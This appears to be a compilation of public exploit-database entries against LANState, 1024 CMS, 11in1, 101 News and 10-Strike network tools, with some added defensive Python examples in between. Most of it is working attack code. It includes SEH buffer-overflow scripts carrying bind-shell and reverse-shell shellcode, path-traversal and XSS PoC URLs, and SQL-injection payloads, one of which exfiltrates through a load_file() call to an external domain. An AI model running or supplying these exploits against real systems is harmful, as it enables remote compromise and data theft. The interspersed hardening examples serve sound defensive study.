"\x75\x50\x63\x30\x52\x70\x63\x58\x56\x51\x4e\x6b\x42\x4f\x4e"
"\x67\x69\x6f\x49\x45\x4d\x6b\x58\x70\x4d\x65\x6d\x72\x50\x56"
"\x75\x38\x6e\x46\x6f\x65\x6f\x4d\x6d\x4d\x39\x6f\x58\x55\x75"
"\x6c\x63\x36\x73\x4c\x76\x6a\x6b\x30\x59\x6b\x4d\x30\x52\x55"
"\x74\x45\x6f\x4b\x43\x77\x42\x33\x63\x42\x62\x4f\x51\x7a\x77"
"\x70\x73\x63\x69\x6f\x58\x55\x72\x43\x30\x61\x72\x4c\x31\x73"
"\x46\x4e\x45\x35\x63\x48\x63\x55\x47\x70\x41\x41"
)
# Offsets
crash_ebp = 228
crash_nseh = 236
crash_seh = crash_nseh + 4
# Variables
nops = "\x90" * 16 # Nops
# Prefix
prefix = "A" * crash_nseh # Filler
nseh = "\x71\x06\x70\x04" # JNO # JO # Jump over NSEH/SEH
seh = struct.pack("<L", 0x0132730f) # call dword ptr ss:[ebp-04] # [LANState.exe]
suffix = nops # Old-school NOP'ing
suffix += shellcode # Magic!
suffix += "D" * (maxlen - len(prefix + nseh + seh + suffix)) # Filler
# Concatenate string for payload
payload = prefix + nseh + seh + suffix # Put it all together
try:
    with open(filename, "wb") as f:
        f.write(payload)
    print "[+] File " + filename + " with size " + str(len(payload)) + " created successfully"
except IOError as e:
    print "[!] Error creating file: " + str(e)
    sys.exit(1)
source: https://www.securityfocus.com/bid/55170/info
1024 CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
1024 CMS 2.1.1 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?p=[SQLi]
source: https://www.securityfocus.com/bid/47282/info
1024cms is prone to multiple cross-site scripting vulnerabilities, multiple local file-include vulnerabilities, and a directory-traversal vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the webserver process and gain access to sensitive information.
1024cms 1.1.0 beta is vulnerable; other versions may also be affected.
http://www.example.com/index.php?mode=login&processfile=../../../../../../etc/passwd%00
http://www.example.com/index.php?msg=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/modules/forcedownload/force_download.php?filename=../../../../../../../etc/passwd
http://www.example.com/index.php?act=../../../../../../etc/passwd%00
http://www.example.com/dashboard.php?act=../../../../../../../etc/passwd%00
http://www.example.com/index.php?msg=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/dashboard.php?msg_error=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/dashboard.php?msg_okay=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/dashboard.php?msg_info=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/dashboard.php?msg_attention=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
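The 11in1 `class` PoCs above and the 1024cms `processfile`, `act` and `filename` PoCs are the same bug in the same shape: a request parameter joined onto a base directory with a fixed suffix, attacked with `../` traversal and a trailing `%00` that cut the suffix off on the PHP builds of the time. The following is an added example for this page, not code from either project (their PHP is not reproduced): the vulnerable resolver as a hypothetical reconstruction of that pattern, beside a hardened one, run over the PoC parameters. The base directory in demo() is a temporary directory created at run time.

```python
"""Local file include: the vulnerable include resolver beside a hardened one.

Added example for this page, not code from 11in1 or 1024cms (their PHP is not
reproduced). It models what both sets of PoCs exploit: a request parameter
(class, act, processfile, filename) joined onto a base directory with a fixed
suffix, attacked with ../ traversal and a trailing %00 that cut the suffix
off on the PHP builds of the time.
"""
import os
import tempfile
from urllib.parse import unquote


def vulnerable_resolve(base_dir, param):
    """Hypothetical vulnerable pattern, the equivalent of
    include($base . $_GET['class'] . '.php') on a PHP that truncated
    filesystem paths at the first NUL byte (fixed in PHP 5.3.4)."""
    path = base_dir + "/" + unquote(param) + ".php"
    return path.split("\0", 1)[0]          # emulate the NUL truncation


def safe_resolve(base_dir, param, suffix=".php"):
    """Decode once, refuse NUL and separators, then confirm the resolved
    path (symlinks followed) is still inside base_dir."""
    name = unquote(param)
    if "\0" in name:
        raise ValueError("NUL byte in include name")
    if "/" in name or "\\" in name or name in ("", ".", ".."):
        raise ValueError("separators and dot entries are not allowed")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name + suffix))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("include resolves outside the base directory")
    return target


# PoC-style parameters, constructed from the advisories above.
PROBES = (
    "login",
    "../../../tmp/file%00",
    "../../../../../../etc/passwd%00",
    "..%2F..%2F..%2Fetc%2Fpasswd",
)


def demo(base_dir=None):
    """Run every probe through both resolvers; returns {probe: (vulnerable
    normalized path, safe outcome)} so the contrast is machine-checkable."""
    base = base_dir or tempfile.mkdtemp(prefix="lfi-demo-")
    results = {}
    for probe in PROBES:
        vulnerable = os.path.normpath(vulnerable_resolve("/var/www/html", probe))
        try:
            safe = os.path.relpath(safe_resolve(base, probe), base)
        except ValueError as err:
            safe = "rejected: " + str(err)
        results[probe] = (vulnerable, safe)
    return results


if __name__ == "__main__":
    for probe, (vulnerable, safe) in demo().items():
        print("%-36s vulnerable -> %-22s safe -> %s" % (probe, vulnerable, safe))
```

Two checks are deliberately redundant: the character allow-list stops traversal before any filesystem call, and the realpath containment check catches what the allow-list cannot see, such as a symlink inside the include directory that points elsewhere. An even stricter version maps the parameter onto a fixed dict of known include names and never touches the filesystem with user input at all.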
## Title: 101 News-1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 09/16/2023
## Vendor: https://mayurik.com/
## Software: https://www.sourcecodester.com/php/16067/best-online-news-portal-project-php-free-download.html
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The searchtitle parameter appears to be vulnerable to SQL injection
attacks. The payload '+(select
load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.oastify.com\\utu'))+'
was submitted in the searchtitle parameter. This payload injects a SQL
sub-query that calls MySQL's load_file function with a UNC file path
that references a URL on an external domain. The application
interacted with that domain, indicating that the injected SQL query
was executed.
[+] Payload:
```mysql
---
Parameter: searchtitle (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: searchtitle=-7320%' OR 3167=3167 AND 'urvA%'='urvA

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchtitle=814271'+(select load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.tupaputka.com\\utu'))+'%' AND (SELECT 8775 FROM (SELECT(SLEEP(15)))yMEL) AND 'gPWH%'='gPWH

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: searchtitle=814271'+(select load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.tupaputka.com\\utu'))+'%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71627a6a71,0x4b6d704e6546715a6662496571705179434d6d5a71586b567a4278464c564d61766174626f787063,0x7170767071),NULL,NULL#
---
```
## Reproduce:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/101%20News-1.0
## Proof and Exploit:
https://www.nu11secur1ty.com/2023/09/101-news-10-multiple-sqli.html
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
nu11secur1ty <http://nu11secur1ty.com/>
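The 11in1 and 1024 CMS `id=1'` probes above and the 101 News `searchtitle` payloads are the same defect seen from two angles: a value concatenated into the query text, found either by the syntax error a stray quote produces or by a TRUE/FALSE condition pair that changes the result set. The following is an added example for this page; the schema and rows are constructed, none of the three applications' PHP is reproduced, and SQLite stands in for MySQL (so the MySQL-only SLEEP() and load_file() payloads are out of scope). It runs the advisory's boolean-based payload and a UNION probe of the same shape against a string-built LIKE search and against the parameterized version.

```python
"""Boolean-based blind and UNION injection on a LIKE search, vulnerable and
parameterized, run against an in-memory SQLite table.

Added example for this page; the schema and rows are constructed and none of
the PHP of 11in1, 1024 CMS or 101 News is reproduced. TRUE_PAYLOAD is the
boolean-based payload from the 101 News advisory; UNION_PAYLOAD is a probe
in the same shape; id=1' is the 11in1 / 1024 CMS style probe.
"""
import sqlite3

TRUE_PAYLOAD = "-7320%' OR 3167=3167 AND 'urvA%'='urvA"
FALSE_PAYLOAD = "-7320%' OR 3167=3168 AND 'urvA%'='urvA"
UNION_PAYLOAD = "zzz%' UNION SELECT id, title FROM news WHERE '1%'='1"


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.executemany("INSERT INTO news (title, body) VALUES (?, ?)", [
        ("Budget vote", "constructed row"),
        ("Local election", "constructed row"),
        ("Weather", "constructed row"),
    ])
    return db


def search_vulnerable(db, searchtitle):
    """String-built LIKE, the pattern the advisories describe."""
    sql = "SELECT id, title FROM news WHERE title LIKE '%" + searchtitle + "%'"
    return db.execute(sql).fetchall()


def search_safe(db, searchtitle):
    """Bound parameter: the user value can only ever be the LIKE pattern.
    % and _ are escaped as well, so the user cannot widen the pattern."""
    escaped = (searchtitle.replace("\\", "\\\\")
                          .replace("%", "\\%")
                          .replace("_", "\\_"))
    sql = "SELECT id, title FROM news WHERE title LIKE ? ESCAPE '\\'"
    return db.execute(sql, ("%" + escaped + "%",)).fetchall()


def by_id_vulnerable(db, id_param):
    """id=1' here raises a syntax error: the classic first sign."""
    return db.execute("SELECT id, title FROM news WHERE id=" + id_param).fetchall()


def by_id_safe(db, id_param):
    """Type coercion first, then a bound parameter; "1'" never reaches SQL."""
    return db.execute("SELECT id, title FROM news WHERE id=?", (int(id_param),)).fetchall()


def boolean_blind_differs(db, search):
    """sqlmap-style probe: a TRUE and a FALSE condition giving different
    result sets (or a syntax error from the quote) means the value lands in
    the query text, not in a parameter."""
    try:
        return search(db, TRUE_PAYLOAD) != search(db, FALSE_PAYLOAD)
    except sqlite3.Error:
        return True


if __name__ == "__main__":
    db = make_db()
    for search in (search_vulnerable, search_safe):
        print(search.__name__, "injectable:", boolean_blind_differs(db, search),
              "union rows:", len(search(db, UNION_PAYLOAD)))
```

With the vulnerable search the TRUE payload returns every row, the FALSE one none, and the UNION probe returns the whole table; with the bound parameter all three are just literal patterns that match nothing. That difference between a TRUE and a FALSE condition is exactly what the boolean-based blind technique in the sqlmap output above is measuring.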
# Exploit Title: 10-Strike Network Scanner 3.0 - Local Buffer Overflow (SEH)
# Exploit Author: Hashim Jawad - ihack4falafel
# Date: 2018-06-05
# Vendor Homepage: https://www.10-strike.com/
# Vulnerable Software: https://www.10-strike.com/network-scanner/network-scanner.exe
# Tested on: Windows XP Professional - SP3 (x86)
# Disclosure Timeline:
# 06-02-18: Contacted vendor, no response
# 06-03-18: Contacted vendor, no response
# 06-04-18: Contacted vendor, no response
# 06-05-18: Proof of concept exploit published
# Steps to reproduce:
# - Copy contents of Evil.txt and paste in 'Host name or address' field under Add host.
# - Right-click on newly created host and click 'Trace route...'.
# - Repeat the second step and boom.
# Notes:
# - '\x00' gets converted to '\x20' by the program, eliminating the possibility of using [pop, pop, retn] pointers in the base binary.
# - All loaded modules are compiled with /SafeSEH.
# - Right-click on the newly created host and click 'System information > General' is affected by the same vulnerability, with different
# offsets and buffer size.
# - root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -v shellcode -f python
# - Payload size: 355 bytes
#!/usr/bin/python
shellcode = ""
shellcode += "\xb8\x2b\x29\xa7\x48\xd9\xe8\xd9\x74\x24\xf4\x5b"
shellcode += "\x29\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\xc0"
shellcode += "\xd5\x45\xbd\xea\xce\x08\x3e\x12\x0f\x6d\xb6\xf7"
shellcode += "\x3e\xad\xac\x7c\x10\x1d\xa6\xd0\x9d\xd6\xea\xc0"
shellcode += "\x16\x9a\x22\xe7\x9f\x11\x15\xc6\x20\x09\x65\x49"
shellcode += "\xa3\x50\xba\xa9\x9a\x9a\xcf\xa8\xdb\xc7\x22\xf8"
shellcode += "\xb4\x8c\x91\xec\xb1\xd9\x29\x87\x8a\xcc\x29\x74"
shellcode += "\x5a\xee\x18\x2b\xd0\xa9\xba\xca\x35\xc2\xf2\xd4"
shellcode += "\x5a\xef\x4d\x6f\xa8\x9b\x4f\xb9\xe0\x64\xe3\x84"
shellcode += "\xcc\x96\xfd\xc1\xeb\x48\x88\x3b\x08\xf4\x8b\xf8"
shellcode += "\x72\x22\x19\x1a\xd4\xa1\xb9\xc6\xe4\x66\x5f\x8d"
shellcode += "\xeb\xc3\x2b\xc9\xef\xd2\xf8\x62\x0b\x5e\xff\xa4"
shellcode += "\x9d\x24\x24\x60\xc5\xff\x45\x31\xa3\xae\x7a\x21"
shellcode += "\x0c\x0e\xdf\x2a\xa1\x5b\x52\x71\xae\xa8\x5f\x89"
shellcode += "\x2e\xa7\xe8\xfa\x1c\x68\x43\x94\x2c\xe1\x4d\x63"
shellcode += "\x52\xd8\x2a\xfb\xad\xe3\x4a\xd2\x69\xb7\x1a\x4c"
shellcode += "\x5b\xb8\xf0\x8c\x64\x6d\x6c\x84\xc3\xde\x93\x69"
shellcode += "\xb3\x8e\x13\xc1\x5c\xc5\x9b\x3e\x7c\xe6\x71\x57"
shellcode += "\x15\x1b\x7a\x46\xba\x92\x9c\x02\x52\xf3\x37\xba"
shellcode += "\x90\x20\x80\x5d\xea\x02\xb8\xc9\xa3\x44\x7f\xf6"
shellcode += "\x33\x43\xd7\x60\xb8\x80\xe3\x91\xbf\x8c\x43\xc6"
shellcode += "\x28\x5a\x02\xa5\xc9\x5b\x0f\x5d\x69\xc9\xd4\x9d"
shellcode += "\xe4\xf2\x42\xca\xa1\xc5\x9a\x9e\x5f\x7f\x35\xbc"
shellcode += "\x9d\x19\x7e\x04\x7a\xda\x81\x85\x0f\x66\xa6\x95"
shellcode += "\xc9\x67\xe2\xc1\x85\x31\xbc\xbf\x63\xe8\x0e\x69"
shellcode += "\x3a\x47\xd9\xfd\xbb\xab\xda\x7b\xc4\xe1\xac\x63"
shellcode += "\x75\x5c\xe9\x9c\xba\x08\xfd\xe5\xa6\xa8\x02\x3c"
shellcode += "\x63\xd8\x48\x1c\xc2\x71\x15\xf5\x56\x1c\xa6\x20"
shellcode += "\x94\x19\x25\xc0\x65\xde\x35\xa1\x60\x9a\xf1\x5a"
shellcode += "\x19\xb3\x97\x5c\x8e\xb4\xbd"
magic = '\xd9\xee' # fldz
magic += '\xd9\x74\x24\xf4' # fnstenv [esp-0xc]
magic += '\x59' # pop ecx
magic += '\x80\xc1\x05' # add cl,0x5
magic += '\x80\xc1\x05' # add cl,0x5
magic += '\x90' # nop
magic += '\xfe\xcd' # dec ch
magic += '\xfe\xcd' # dec ch
magic += '\xff\xe1' # jmp ecx
buffer = '\x90' * 28 # nops
buffer += shellcode # bind shell
buffer += '\xcc' * (516-28-len(shellcode)) # filler to nSEH
buffer += '\x75\x06\x74\x06' # nSEH | jnz +6 / jz +6: jump over the SEH record
buffer += '\x18\x05\xfc\x7f' # SEH | 0x7ffc0518 : pop edi # pop edi # ret [SafeSEH Bypass]
buffer += '\x90' * 5 # nops
buffer += magic # jump -512
buffer += '\xcc' * (3000-516-4-4-5-len(magic)) # junk
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e
# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH)
# Date: 2021-10-31
# Exploit Author: ro0k
# Vendor Homepage: https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
# Version: 9.31
# Tested on: Windows 10 x64 Education 21H1 Build 19043.928
# Proof of Concept:
# 1.Run python2 exploit.py to generate overflow.txt
# 2.Transfer overflow.txt to the Windows 10 machine
# 3.Setup Netcat listener on attacker machine
# 4.Open 10-Strike Network Inventory Explorer Pro
# 5.Select Computers tab from the uppermost set of tabs
# 6.Select From Text File option
# 7.Open overflow.txt
# 8.Receive reverse shell connection on attacker machine!
#!/usr/bin/env python
import struct
charslist = ""
badchars = [0x00,0x09,0x0a,0x0d,0x3a,0x5c]
for i in range (0x00, 0xFF+1):
if i not in badchars:
charslist += chr(i)
#msfvenom -p windows/shell_reverse_tcp LHOST=10.2.170.242 LPORT=443 EXITFUNC=thread -f c -a x86 -b "\x00\x09\x0a\x0d\x3a\x5c"
shellcode = ("\xd9\xc8\xd9\x74\x24\xf4\x58\x33\xc9\xbb\xc6\xbc\xd3\x19\xb1"
"\x52\x83\xc0\x04\x31\x58\x13\x03\x9e\xaf\x31\xec\xe2\x38\x37"
"\x0f\x1a\xb9\x58\x99\xff\x88\x58\xfd\x74\xba\x68\x75\xd8\x37"
"\x02\xdb\xc8\xcc\x66\xf4\xff\x65\xcc\x22\xce\x76\x7d\x16\x51"
"\xf5\x7c\x4b\xb1\xc4\x4e\x9e\xb0\x01\xb2\x53\xe0\xda\xb8\xc6"
"\x14\x6e\xf4\xda\x9f\x3c\x18\x5b\x7c\xf4\x1b\x4a\xd3\x8e\x45"
"\x4c\xd2\x43\xfe\xc5\xcc\x80\x3b\x9f\x67\x72\xb7\x1e\xa1\x4a"
"\x38\x8c\x8c\x62\xcb\xcc\xc9\x45\x34\xbb\x23\xb6\xc9\xbc\xf0"
"\xc4\x15\x48\xe2\x6f\xdd\xea\xce\x8e\x32\x6c\x85\x9d\xff\xfa"
"\xc1\x81\xfe\x2f\x7a\xbd\x8b\xd1\xac\x37\xcf\xf5\x68\x13\x8b"
"\x94\x29\xf9\x7a\xa8\x29\xa2\x23\x0c\x22\x4f\x37\x3d\x69\x18"
"\xf4\x0c\x91\xd8\x92\x07\xe2\xea\x3d\xbc\x6c\x47\xb5\x1a\x6b"
"\xa8\xec\xdb\xe3\x57\x0f\x1c\x2a\x9c\x5b\x4c\x44\x35\xe4\x07"
"\x94\xba\x31\x87\xc4\x14\xea\x68\xb4\xd4\x5a\x01\xde\xda\x85"
"\x31\xe1\x30\xae\xd8\x18\xd3\xdb\x1e\x88\xd1\xb4\x1c\xcc\x14"
"\xfe\xa8\x2a\x7c\x10\xfd\xe5\xe9\x89\xa4\x7d\x8b\x56\x73\xf8"
"\x8b\xdd\x70\xfd\x42\x16\xfc\xed\x33\xd6\x4b\x4f\x95\xe9\x61"
"\xe7\x79\x7b\xee\xf7\xf4\x60\xb9\xa0\x51\x56\xb0\x24\x4c\xc1"
"\x6a\x5a\x8d\x97\x55\xde\x4a\x64\x5b\xdf\x1f\xd0\x7f\xcf\xd9"
"\xd9\x3b\xbb\xb5\x8f\x95\x15\x70\x66\x54\xcf\x2a\xd5\x3e\x87"
"\xab\x15\x81\xd1\xb3\x73\x77\x3d\x05\x2a\xce\x42\xaa\xba\xc6"
"\x3b\xd6\x5a\x28\x96\x52\x7a\xcb\x32\xaf\x13\x52\xd7\x12\x7e"
"\x65\x02\x50\x87\xe6\xa6\x29\x7c\xf6\xc3\x2c\x38\xb0\x38\x5d"
"\x51\x55\x3e\xf2\x52\x7c")
#pattern_offset.rb -l 250 -q 41316841
offset = 213
#nasm > jmp short 8
nseh = "\xeb\x06\x90\x90"
junk = "A" * (offset - len(nseh))
#0x61e012f6 : pop edi # pop ebp # ret | {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.12.2 (C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\sqlite3.dll)
seh = struct.pack("<I", 0x61e012f6)
#metasm > sub esp,0x10
subesp10="\x83\xec\x10"
payload = shellcode
buffer = junk + nseh + seh + subesp10 + payload
f = open("overflow.txt", "w")
f.write(buffer)
f.close()
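Every entry on this page that goes through "Computers -> From Text File" depends on the same defect: the importer copies each line of the file into a fixed-size stack buffer with no length check, which is why a 213/214-byte line reaches the exception handler record. Added example, not from any of the exploit authors above and not 10-Strike's code: a validator that applies the bounds an importer of host lists should enforce (RFC 1123 name length and label grammar, ASCII only, a cap on entry count) and reports why each refused line was refused. The sample inputs, the constants and the function names (validate_host_list, is_hostname, is_ipv4) are constructed for this example.

```python
"""Validate a 'computers from text file' list before a parser with fixed-size
stack buffers ever sees it. Constructed example, not 10-Strike's code."""
import re

MAX_HOSTNAME = 253   # RFC 1123: a fully qualified name is at most 253 characters
MAX_ENTRIES = 10000  # constructed cap on list size
# One DNS label: 1-63 chars, alphanumerics and '-', no leading or trailing '-'
LABEL_RE = re.compile(r"^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")
IPV4_RE = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$")

# Constructed inputs: a benign inventory list, a line shaped like the PoC
# files on this page (a long run of 'A's followed by non-ASCII bytes), and an
# over-long but otherwise printable line.
GOOD_LIST = b"# lab hosts\nfileserver01\n10.0.0.12\nprinter.lab.example\n"
POC_LIKE = b"A" * 213 + b"\xeb\x06\x90\x90" + b"\n"
LONG_LINE = b"A" * 300 + b"\n"


def is_ipv4(s):
    m = IPV4_RE.match(s)
    return bool(m) and all(0 <= int(o) <= 255 for o in m.groups())


def is_hostname(s):
    if not s or len(s) > MAX_HOSTNAME or s.endswith("."):
        return False
    return all(LABEL_RE.match(label) for label in s.split("."))


def validate_host_list(data, max_entries=MAX_ENTRIES):
    """Return (accepted, rejected) for raw file bytes.

    accepted: clean entries, in order; rejected: (line_no, reason) pairs.
    A file that is not pure ASCII is refused outright (line_no 0), because
    jump stubs and shellcode can never be valid hostnames."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError as e:
        return [], [(0, "non-ASCII byte 0x%02x at offset %d" % (data[e.start], e.start))]
    accepted, rejected = [], []
    for n, raw in enumerate(text.splitlines(), 1):
        entry = raw.strip()
        if not entry or entry.startswith("#"):
            continue  # blank line or comment
        if len(entry) > MAX_HOSTNAME:
            # The length check comes first: this is the bound the importer lacks
            rejected.append((n, "entry length %d exceeds %d" % (len(entry), MAX_HOSTNAME)))
        elif not (is_hostname(entry) or is_ipv4(entry)):
            rejected.append((n, "not a hostname or IPv4 address"))
        elif len(accepted) >= max_entries:
            rejected.append((n, "more than %d entries" % max_entries))
        else:
            accepted.append(entry)
    return accepted, rejected


if __name__ == "__main__":
    for name, blob in (("GOOD_LIST", GOOD_LIST), ("POC_LIKE", POC_LIKE), ("LONG_LINE", LONG_LINE)):
        ok, bad = validate_host_list(blob)
        print("%s: %d accepted, rejected=%s" % (name, len(ok), bad))
```

The order of checks matters: length is tested before grammar so that an over-long line is refused on size alone and never reaches a regex over hundreds of bytes, and the decode step rejects the whole file rather than one line because a binary blob in a host list has no legitimate reading.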
# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 04-11-2021
# Vendor Homepage: https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
# Tested Version: 9.31
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
srvInventoryWebServer srvInventoryWebServer C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\InventoryWebServer.exe Auto
C:\>sc qc srvInventoryWebServer
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: srvInventoryWebServer
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\InventoryWebServer.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : srvInventoryWebServer
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)
# Date: 2020-12-22
# Exploit Author: Florian Gassner
# Vendor Homepage: https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
# Version: 9.05
# Tested on: Windows 10 x64
# Computer -> From Text File -> Choose exploit.txt
import struct
"""
Message= - Pattern h1Ah (0x68413168) found in cyclic pattern at position 214
"""
OFFSET = 214
"""
badchars = '\x00\x09\x0a\x0d\x3a\x5c'
"""
"""
Log data, item 23
Address=01015AF4
Message= 0x01015af4 : pop ecx # pop ebp # ret 0x04 | {PAGE_EXECUTE_READWRITE} [NetworkInventoryExplorer.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\NetworkInventoryExplorer.exe
"""
pop_pop_ret = struct.pack("<I", 0x01015af4)
short_jump = '\xEB\x06\x90\x90'
"""
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.19.129 LPORT=443 -f python -v shellcode -b "\x00\x09\x0a\x0d\x3a\x5c" EXITFUNC=thread
"""
shellcode = ""
shellcode += "\xda\xc7\xba\xee\x50\x53\xe0\xd9\x74\x24\xf4"
shellcode += "\x5d\x33\xc9\xb1\x52\x83\xed\xfc\x31\x55\x13"
shellcode += "\x03\xbb\x43\xb1\x15\xbf\x8c\xb7\xd6\x3f\x4d"
shellcode += "\xd8\x5f\xda\x7c\xd8\x04\xaf\x2f\xe8\x4f\xfd"
shellcode += "\xc3\x83\x02\x15\x57\xe1\x8a\x1a\xd0\x4c\xed"
shellcode += "\x15\xe1\xfd\xcd\x34\x61\xfc\x01\x96\x58\xcf"
shellcode += "\x57\xd7\x9d\x32\x95\x85\x76\x38\x08\x39\xf2"
shellcode += "\x74\x91\xb2\x48\x98\x91\x27\x18\x9b\xb0\xf6"
shellcode += "\x12\xc2\x12\xf9\xf7\x7e\x1b\xe1\x14\xba\xd5"
shellcode += "\x9a\xef\x30\xe4\x4a\x3e\xb8\x4b\xb3\x8e\x4b"
shellcode += "\x95\xf4\x29\xb4\xe0\x0c\x4a\x49\xf3\xcb\x30"
shellcode += "\x95\x76\xcf\x93\x5e\x20\x2b\x25\xb2\xb7\xb8"
shellcode += "\x29\x7f\xb3\xe6\x2d\x7e\x10\x9d\x4a\x0b\x97"
shellcode += "\x71\xdb\x4f\xbc\x55\x87\x14\xdd\xcc\x6d\xfa"
shellcode += "\xe2\x0e\xce\xa3\x46\x45\xe3\xb0\xfa\x04\x6c"
shellcode += "\x74\x37\xb6\x6c\x12\x40\xc5\x5e\xbd\xfa\x41"
shellcode += "\xd3\x36\x25\x96\x14\x6d\x91\x08\xeb\x8e\xe2"
shellcode += "\x01\x28\xda\xb2\x39\x99\x63\x59\xb9\x26\xb6"
shellcode += "\xce\xe9\x88\x69\xaf\x59\x69\xda\x47\xb3\x66"
shellcode += "\x05\x77\xbc\xac\x2e\x12\x47\x27\x91\x4b\x54"
shellcode += "\x36\x79\x8e\x5a\x39\xc1\x07\xbc\x53\x25\x4e"
shellcode += "\x17\xcc\xdc\xcb\xe3\x6d\x20\xc6\x8e\xae\xaa"
shellcode += "\xe5\x6f\x60\x5b\x83\x63\x15\xab\xde\xd9\xb0"
shellcode += "\xb4\xf4\x75\x5e\x26\x93\x85\x29\x5b\x0c\xd2"
shellcode += "\x7e\xad\x45\xb6\x92\x94\xff\xa4\x6e\x40\xc7"
shellcode += "\x6c\xb5\xb1\xc6\x6d\x38\x8d\xec\x7d\x84\x0e"
shellcode += "\xa9\x29\x58\x59\x67\x87\x1e\x33\xc9\x71\xc9"
shellcode += "\xe8\x83\x15\x8c\xc2\x13\x63\x91\x0e\xe2\x8b"
shellcode += "\x20\xe7\xb3\xb4\x8d\x6f\x34\xcd\xf3\x0f\xbb"
shellcode += "\x04\xb0\x30\x5e\x8c\xcd\xd8\xc7\x45\x6c\x85"
shellcode += "\xf7\xb0\xb3\xb0\x7b\x30\x4c\x47\x63\x31\x49"
shellcode += "\x03\x23\xaa\x23\x1c\xc6\xcc\x90\x1d\xc3"
payload = 'A' * (OFFSET - len(short_jump))
payload += short_jump
payload += pop_pop_ret
payload += '\x90' * 8
payload += shellcode
f = open("exploit.txt", "w")
f.write(payload)
f.close()
# Exploit Title: 10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)
# Date: 2020-03-30
# Exploit Author: Hodorsec
# Version: 9.03
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
# Vendor Homepage: https://www.10-strike.com
# Tested on: Win8.1 x64 - Build 9600
# Description:
# - Exploits the functionality to load a list of computers from a file
# - Some DLL's and the main EXE don't rebase, which allowed for some instruction reusage for ROP
# - Used a jump after ROP to go to a buffer for more space
# Reproduction:
# - Run the script, a TXT file will be generated
# - Open the program and click on tab "Computers"
# - Click the button "From Text File" and select the generated TXT file
# - Click OK and check results
# WinDBG initial crash output:
# (f54.f48): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\10-Strike Network Inventory Explorer\NetworkInventoryExplorer.exe
# eax=000013d3 ebx=0018f778 ecx=000002e4 edx=0018f7c0 esi=08fd8d8c edi=00190000
# eip=00402b47 esp=0018f6e4 ebp=0018f73c iopl=0 nv up ei pl nz na po cy
